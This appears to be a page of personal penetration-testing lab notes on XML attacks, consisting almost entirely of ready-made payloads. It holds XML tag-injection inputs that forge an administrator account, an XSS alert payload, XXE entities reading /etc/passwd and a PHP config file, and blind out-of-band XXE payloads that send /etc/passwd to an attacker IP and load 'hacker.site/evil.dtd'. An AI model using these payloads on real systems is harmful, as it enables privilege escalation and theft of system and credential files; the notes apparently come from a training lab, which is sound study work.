<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>XML-XXE-XPATH</title>
</head><body><br/>
Downloading xcat<br/>
<br/>
1.<span style="font-family: Times New Roman"><span style="font-size: 7pt">    </span></span>Download get-pip.py from <a href="https://bootstrap.pypa.io/get-pip.py">https://bootstrap.pypa.io/get-pip.py<br/>
</a>2. &nbsp;Go to download directory.<br/>
3. &nbsp;Run ‘Python3 get-pip.py<br/>
4. &nbsp;Go to xcat install directory<br/>
<br/>
<br/>
XML tag injection<br/>
-------------------<br/>
<br/>
Name: useless<br/>
Username: useless@yahoo.com&lt;/username&gt;&lt;/user&gt;&lt;user&gt;&lt;rule&gt;1&lt;/rule&gt;&lt;name&gt;l33t&lt;/name&gt;&lt;username&gt;admin@yahoo.com<br/>
Password: l33t<br/>
<br/>
Name: &lt;/name&gt;&lt;/user&gt;&lt;user&gt;&lt;rule&gt;1&lt;!--<br/>
Username: --&gt;&lt;/rule&gt;&lt;name&gt;x&lt;/name&gt;&lt;username&gt;x<br/>
Password: l33t<br/>
<br/>
Name: &lt;/name&gt;&lt;/user&gt;&lt;user&gt;&lt;rule{NEW LINE}&gt;1&lt;!--<br/>
Username: --&gt;&lt;/rule{NEW LINE}&gt;&lt;username&gt;l33t<br/>
Password: l33t<br/>
<br/>
&lt;script&gt;&lt;![CDATA[alert]]&gt;('XSS')&lt;/script&gt;<br/>
-------------------<br/>
<br/>
XML XXE or (XML external entity)<br/>
<br/>
&lt;?xml version="1.0" ?&gt;<br/>
&lt;!DOCTYPE passwd [<br/>
&#09;&lt;!ELEMENT passwd ANY&gt;<br/>
&#09;&lt;!ENTITY passwd SYSTEM "file:///etc/passwd"&gt;<br/>
]&gt;<br/>
&lt;passwd&gt;&amp;passwd;&lt;/passwd&gt;<br/>
<br/>
<br/>
----------------------<br/>
<br/>
Resource inclusion with php input/output streams and encoding<br/>
<br/>
&lt;!DOCTYPE message [<br/>
<br/>
&#09;...<br/>
&#09;&lt;ENTITY xxefile SYSTEM "php://filter/read=convert.base64-encode/resource=file:///path/to/config.php"&gt;<br/>
]&gt;<br/>
&lt;message&gt;<br/>
&#09;...<br/>
&#09;&lt;body&gt;&amp;xxefile;&lt;/body&gt;<br/>
&lt;/message&gt;<br/>
<br/>
------------------------<br/>
<br/>
Resource inclusion<br/>
<br/>
&lt;!DOCTYPE message [<br/>
&#09;...&#09;<br/>
&lt;!ENTITY xxefile SYSTEM "file:///etc/passwd"&gt;<br/>
]&gt;<br/>
&lt;message&gt;<br/>
&#09;...<br/>
&lt;body&gt;&amp;xxefile;&lt;/body&gt;<br/>
&lt;/message&gt;<br/>
<br/>
-------------------------<br/>
Working example of post request (XML Tab)<br/>
<br/>
&lt;?xml version="1.0" encoding="utf-8"?&gt;<br/>
&lt;!DOCTYPE crimeTest [<br/>
&lt;!ENTITY fakeEntity SYSTEM "file:///etc/passwd"&gt;<br/>
]&gt;<br/>
&lt;login&gt;<br/>
&nbsp; &lt;username&gt;matt..&amp;fakeEntity;&lt;/username&gt;<br/>
&nbsp; &lt;password&gt;poop...&amp;fakeEntity;&lt;/password&gt;<br/>
&lt;/login&gt;<br/>
<br/>
-------------------------------<br/>
XXESERVE PROGRAM<br/>
<br/>
&lt;?xml version="1.0" encoding="utf-8"?&gt;<br/>
&lt;!DOCTYPE root [<br/>
&lt;!ENTITY % remote SYSTEM "http://10.100.13.200:8080/xml?f=/etc/passwd"&gt;<br/>
%remote;<br/>
%int;<br/>
%trick;]&gt;<br/>
<br/>
** This is a test for lab number 6 XML External entities (blind)<br/>
<br/>
&lt;?xml version='1.0'?&gt;<br/>
&lt;!DOCTYPE xxe [<br/>
&lt;!ENTITY % EvilDTD SYSTEM 'http://hacker.site/evil.dtd'&gt;<br/>
%EvilDTD;<br/>
%LoadOOBEnt;<br/>
%OOB;<br/>
]&gt;</body></html>